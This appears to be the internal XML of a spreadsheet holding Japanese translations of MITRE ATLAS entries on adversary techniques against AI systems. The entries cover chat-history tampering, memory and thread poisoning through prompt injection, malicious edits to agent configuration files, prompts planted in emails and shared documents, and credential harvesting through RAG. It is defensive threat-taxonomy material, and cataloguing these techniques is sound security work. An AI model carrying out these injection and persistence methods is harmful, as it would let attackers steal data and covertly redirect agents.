    <t>敵対者は、悪意のある行為の痕跡を隠すために、ユーザーの大規模言語モデル（LLM）チャット履歴を操作することがあります。LLM の動作に加えた永続的な変更を隠蔽したり、ユーザーの個人情報を入手しようとする試みを隠蔽したりすることもあります。
敵対者は、隠蔽工作の一環として、既存のメッセージを削除または編集したり、新しいスレッドを作成したりすることがあります。これは、敵対者が、被害者のバックエンド LLM サービスの認証トークンを保有しているか、被害者のチャット インターフェースに直接アクセスできる場合に可能です。
チャット インターフェース（特にデスクトップ インターフェース）は、チャット履歴を最初に開いたときに一度だけ更新するため、進行中のチャットに対して挿入されたプロンプトを表示しないことがよくあります。これにより、敵対者の操作が被害者に気付かれない可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="121" eb="123">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="184" eb="186">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="366" eb="368">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）の記憶を操作し、LLM への変更を将来のチャット セッションにまで保持する可能性があります。
記憶は、LLM の一般的な機能であり、ユーザー固有のデータベースを利用することで、チャット セッションをまたいで情報を覚えておくことができます。記憶はユーザーとの通常の会話（例：「…の設定を覚えておいてください」）を通じて制御されるため、敵対者は直接プロンプト インジェクションまたは間接プロンプト インジェクションによって記憶を注入することができます。記憶には、悪意のある命令（例：プライベートな会話を漏洩する命令）が含まれていたり、敵対者の隠れた目的（例：ユーザーを操作すること）を促進したりする可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="19" eb="21">
      <t>キオク</t>
    </rPh>
    <rPh sb="66" eb="68">
      <t>キオク</t>
    </rPh>
    <rPh sb="125" eb="126">
      <t>オボ</t>
    </rPh>
    <rPh sb="138" eb="140">
      <t>キオク</t>
    </rPh>
    <rPh sb="158" eb="160">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="161" eb="162">
      <t>オボ</t>
    </rPh>
    <rPh sb="185" eb="187">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="228" eb="230">
      <t>キオク</t>
    </rPh>
    <rPh sb="243" eb="245">
      <t>キオク</t>
    </rPh>
    <rPh sb="284" eb="286">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、システム上の AI エージェントの設定ファイルを改変する可能性があります。これにより、悪意のある変更は単一のエージェントの寿命を超えて存続し、設定を共有するすべてのエージェントに影響を与える可能性があります。
設定の変更には、システム プロンプトの変更、知識ソースの改ざんまたは置換、接続ツールの設定変更などが含まれます。これらの変更により、敵対者は、出力やツールを悪意のあるサービスにリダイレクトしたり、データを盗み出すための秘密の命令を埋め込んだり、通常はエージェントの動作を制限するセキュリティ管理策を弱体化させたりする可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="177" eb="179">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="256" eb="259">
      <t>カンリサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、侵害されたシステム上の OS キャッシュ、アプリケーション メモリ、その他のソースから資格情報を抽出する可能性があります。資格情報は、多くの場合ハッシュまたは平文の形式で提供され、ユーザー名とパスワード、アプリケーション トークン、その他の認証鍵が含まれる場合があります。
資格情報は、AI エージェント、LLM、AI 推論 API などの他の AI サービスにアクセスするための[水平展開](/tactics/AML.TA0015)を実行するために使用される可能性があります。また、資格情報は、AI DevOps ライフサイクルの一部である他のソフトウェア ツールやデータ ソースへのアクセスを敵対者に与える可能性もあります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="48" eb="50">
      <t>シカク</t>
    </rPh>
    <rPh sb="66" eb="68">
      <t>シカク</t>
    </rPh>
    <rPh sb="127" eb="128">
      <t>カギ</t>
    </rPh>
    <rPh sb="143" eb="145">
      <t>シカク</t>
    </rPh>
    <rPh sb="197" eb="199">
      <t>スイヘイ</t>
    </rPh>
    <rPh sb="199" eb="201">
      <t>テンカイ</t>
    </rPh>
    <rPh sb="248" eb="250">
      <t>シカク</t>
    </rPh>
    <rPh sb="304" eb="306">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、生成 AI (GenAI) を用いて、本物らしく見える合成メディア（画像、動画、音声、テキストなど）を作成する可能性があります。これらの「ディープフェイク」は、実在の人物を模倣したり、架空の人物を描写したりすることがあります。敵対者は、ディープフェイクを用いて[フィッシング](/techniques/AML.T0052)を実行したり、生体認証システムなどの AI アプリケーションを回避したりする可能性があります（[AI モデルの回避](/techniques/AML.T0015) を参照）。
メディアの操作は以前から可能でしたが、生成 AI は必要なスキルと労力を軽減し、敵対者がより多くのユーザーやシステムを標的にするために迅速に操作を拡大することを可能にします。また、リアルタイムの操作も可能になります。
敵対者は、正当なユース ケース向けに設計されたオープン ソースのモデルやソフトウェアを利用して、悪意のある目的でディープフェイクを生成する可能性があります。しかし、 [ProKYC](https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/)などの悪意のあるユースケースに特化したプロジェクトが存在します。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="118" eb="120">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="274" eb="276">
      <t>セイセイ</t>
    </rPh>
    <rPh sb="295" eb="297">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="365" eb="367">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="573" eb="575">
      <t>ソンザイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、標的の絞り込みに利用可能な被害者のアイデンティティーを収集する可能性があります。アイデンティティーには、個人情報（例：従業員名、メール アドレス、写真など）に加え、資格情報や多要素認証（MFA）設定といった機密情報など、様々な情報が含まれる可能性があります。
敵対者は、直接的な聞き出し、[被害者所有のウェブサイトの検索](/techniques/AML.T0003)、ブラック マーケット上にある漏洩済み情報などといった様々な方法で、この情報を収集する可能性があります。
敵対者は、収集した被害者データを用いてディープフェイクを作成し、説得力のある方法で被害者になりすます可能性があります。これにより、敵対者は、なりすまししたアイデンティティーで[アカウントの確立](/techniques/AML.T0021)を行なったたり、説得力のある[フィッシング](/techniques/AML.T0052) 攻撃を実行したりする機会を得る可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="8" eb="9">
      <t>シボ</t>
    </rPh>
    <rPh sb="10" eb="11">
      <t>コ</t>
    </rPh>
    <rPh sb="87" eb="89">
      <t>シカク</t>
    </rPh>
    <rPh sb="136" eb="138">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="201" eb="202">
      <t>ジョウ</t>
    </rPh>
    <rPh sb="207" eb="208">
      <t>ス</t>
    </rPh>
    <rPh sb="244" eb="246">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="309" eb="311">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="338" eb="340">
      <t>カクリツ</t>
    </rPh>
    <rPh sb="365" eb="366">
      <t>オコ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI モデルへの完全な「ホワイト ボックス」アクセスを取得する可能性があります。これは、敵対者がモデル アーキテクチャー、そのパラメーター、およびクラス オントロジーに関する完全な知識を持っていることを意味します。敵対者は、モデルを持出して [敵対的データの作成](/techniques/AML.T0043) や [攻撃の検証](/techniques/AML.T0042) を行う可能性があり、その動作を検出するのは困難です。</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>トリガー</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI エージェントがアクセスできるツールを探索する可能性があります。利用可能なツールを特定することで、敵対者はエージェントを通じてどのようなアクションが実行され、どのような追加リソースにアクセスできるかを把握できます。この情報により、OneDrive や SharePoint などの外部データ ソースへのアクセスや、メール送信機能などの情報漏洩経路が明らかになる可能性があり、敵対者は最も価値の高いあるいは攻撃の機会となる AI エージェントを特定できるようになります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="26" eb="28">
      <t>タンサク</t>
    </rPh>
    <rPh sb="56" eb="58">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="194" eb="196">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、大規模言語モデル（LLM）のチャット スレッドに悪意のある命令を挿入し、スレッド後の期間にわたって動作の変更を引き起こす可能性があります。チャット スレッドは、複数のセッションにわたって長期間継続する可能性があります。
悪意のある命令は、直接プロンプト インジェクションまたは間接プロンプト インジェクションによって挿入される可能性があります。直接インジェクションは、敵対者がユーザーの LLM API 鍵を取得し、任意のスレッドに直接クエリを挿入できる場合に発生する可能性があります。
LLM のトークン上限が増加すると、AI システムはより大きなコンテキスト ウィンドウを利用できるようになり、悪意のある命令がスレッド内でより長く存続できるようになります。
共有スレッドを持つサービスで LLM が使用されている場合、スレッド汚染は複数のユーザーに影響を与える可能性があります。例えば、エージェントが複数の参加者がいる Slack チャンネルでアクティブな場合、あるユーザーからの悪意のあるメッセージ 1 つが、エージェントの今後の他のユーザーとのやり取りに影響を与える可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="45" eb="46">
      <t>アト</t>
    </rPh>
    <rPh sb="190" eb="192">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="208" eb="209">
      <t>カギ</t>
    </rPh>
    <rPh sb="260" eb="262">
      <t>ジョウゲン</t>
    </rPh>
    <rPh sb="372" eb="374">
      <t>オセン</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>公開アプリケーション経由のプロンプト浸透</t>
    <rPh sb="0" eb="2">
      <t>コウカイ</t>
    </rPh>
    <rPh sb="10" eb="12">
      <t>ケイユ</t>
    </rPh>
    <rPh sb="18" eb="20">
      <t>シントウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、被害者の環境内で発生するユーザー アクションまたはイベントを介してプロンプト インジェクションをトリガーする可能性があります。トリガーされたプロンプト インジェクションは、多くの場合 AI エージェントを標的としており、敵対者は[探索](/tactics/AML.TA0008)中に特定した手段によって起動できます（[起動トリガー](/techniques/AML.T0084.002)を参照）。これらの悪意のあるプロンプトは、ユーザーから隠蔽または難読化されている場合があり、敵対者が[公開アプリケーション経由のプロンプト浸透](/techniques/AML.T0093)を実行する際に、被害者の環境のどこかに既に存在している可能性があります。この種類のインジェクションは、敵対者がシステムへの足掛かりを得たり、システムの無意識のユーザーを標的にしたりするために利用される可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="115" eb="117">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="120" eb="122">
      <t>タンサク</t>
    </rPh>
    <rPh sb="164" eb="166">
      <t>キドウ</t>
    </rPh>
    <rPh sb="244" eb="246">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="332" eb="333">
      <t>ルイ</t>
    </rPh>
    <rPh sb="344" eb="346">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、標的の絞り込みに利用可能な被害者に関する情報を得るために、公開 Web サイトやドメインを検索する場合があります。被害者に関する情報は、ソーシャル メディア、新しいサイト、被害者が所有するドメインなど、様々なオンライン サイトで入手できる可能性があります。
敵対者は、検索エンジンを介して収集したい情報を見つける場合があります。正確な検索クエリを使用することで、被害者が使用しているソフトウェア プラットフォームやサービスを特定し、標的の絞り込みに利用することができます。その後、[公開アプリケーションの悪用](/techniques/AML.T0049)や[公開アプリケーション経由のプロンプト浸透](/techniques/AML.T0093)といった攻撃が続く場合があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="8" eb="9">
      <t>シボ</t>
    </rPh>
    <rPh sb="10" eb="11">
      <t>コ</t>
    </rPh>
    <rPh sb="135" eb="137">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="225" eb="226">
      <t>シボ</t>
    </rPh>
    <rPh sb="227" eb="228">
      <t>コ</t>
    </rPh>
    <rPh sb="258" eb="260">
      <t>アクヨウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、被害者のシステム上の大規模言語モデル（LLM）へのアクセスを利用して、資格情報を収集しようとする可能性があります。資格情報は、内部文書に保存され、意図せず RAG データベースに取り込まれ、最終的に AI エージェントによって取得される可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="40" eb="42">
      <t>シカク</t>
    </rPh>
    <rPh sb="62" eb="64">
      <t>シカク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI サービスに RAG データベースからデータを取得するよう指示する可能性があります。RAG データベースには、組織の内部文書の大部分が含まれる可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、将来のある時点で悪意のあるプロンプトが AI に取り込まれ最終的に下流に影響を与えることを意図して、公開アプリケーションを介して被害者のシステムに悪意のあるプロンプトを仕込みます。これは、データ ソースが検索拡張生成（RAG）システムによってインデックス化される場合、ルールが AI エージェントのアクションをトリガーする場合、またはユーザーが大規模言語モデル（LLM）を使用して悪意のあるコンテンツとやり取りする場合に発生する可能性があります。悪意のあるプロンプトは被害者のシステムに長期間残留し、被害者組織内の複数のユーザーやさまざまな AI ツールに影響を与える可能性があります。
テキスト入力を受け入れる公開アプリケーションはすべて標的となる可能性があります。これには、電子メール、OneDrive や Google Drive などの共有文書システム、Jira などのサービス デスクやチケット システムが含まれます。
敵対者は、[偵察](/tactics/AML.TA0002)を実行して、AI エージェントによって監視されている可能性のある、または RAG によってインデックス化されている可能性のある公開アプリケーションを特定する可能性があります。また、[AI エージェントの設定の探索](/techniques/AML.T0084) を実行し、標的の絞り込みを洗練する可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="13" eb="15">
      <t>アクイ</t>
    </rPh>
    <rPh sb="380" eb="382">
      <t>ブンショ</t>
    </rPh>
    <rPh sb="422" eb="424">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="553" eb="555">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="556" eb="558">
      <t>タンサク</t>
    </rPh>
    <rPh sb="588" eb="590">
      <t>ヒョウテキ</t>
    </rPh>
    <rPh sb="591" eb="592">
      <t>シボ</t>
    </rPh>
    <rPh sb="593" eb="594">
      <t>コ</t>
    </rPh>
    <rPh sb="596" eb="598">
      <t>センレン</t>
    </rPh>
    <rPh sb="600" eb="603">
      <t>カノウセイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、システム上で実行中のプロセスに関する情報を取得しようとする可能性があります。この情報を入手すれば、ネットワーク内のシステムで実行されている一般的な AI 関連ソフトウェア／アプリケーションを把握するために利用される可能性があります。管理者権限などの昇格された権限があれば、プロセスの詳細をより詳しく把握できる可能性があります。
AI ソフトウェア スタックを特定することで、敵対者は、新たな標的や攻撃経路を見つける可能性があります。AI 関連ソフトウェアは、バックエンド サービスとの認証にアプリケーション トークンを必要とする場合があります。これは、[資格情報へのアクセス](/tactics/AML.TA0013)と[水平展開](/tactics/AML.TA0015)の機会となります。
Windows 環境では、敵対者は、コマンド プロンプト経由で Tasklist ユーティリティを使用するか、PowerShell 経由で `Get-Process` を使用することで、実行中のプロセスの詳細を取得できます。プロセスに関する情報は、`CreateToolhelp32Snapshot` などのネイティブ API 呼び出しの出力から抽出することもできます。Mac と Linux では、`ps` コマンドで実行できます。また、敵対者は`/proc`を介してプロセスを列挙することもできます。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="193" eb="195">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="317" eb="319">
      <t>スイヘイ</t>
    </rPh>
    <rPh sb="319" eb="321">
      <t>テンカイ</t>
    </rPh>
    <rPh sb="367" eb="369">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="574" eb="576">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="586" eb="587">
      <t>カイ</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</si>
</sst>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ＭＳ Ｐゴシック"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="128"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="128"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="6"/>
      <name val="ＭＳ Ｐゴシック"/>
      <family val="3"/>
      <charset val="128"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <family val="3"/>
      <charset val="128"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <family val="3"/>
      <charset val="128"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Meiryo UI"/>
      <family val="3"/>
      <charset val="128"/>
    </font>
  </fonts>
  <fills count="5">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s>
  <borders count="4">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">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0" fontId="10" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="33">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="14" fontId="4" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="3" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="3" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="3" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="3" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="14" fontId="12" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="ハイパーリンク" xfId="1" builtinId="8"/>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atlas.mitre.org/techniques/AML.T0037" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0034" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0021" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0048" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0054" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0077" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0060" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0066" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0012" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0075" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0011.000" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0016.000" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0014" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.002" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0064" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.000" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.003" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.003" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0069.001" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0010.001" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0072" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0008.004" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0043" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0002.000" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0015" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0024.002" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0065" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0067" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0042" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atlas.mitre.org/techniques/AML.T0041" TargetMode="External"/><Relationship Id="rId85" 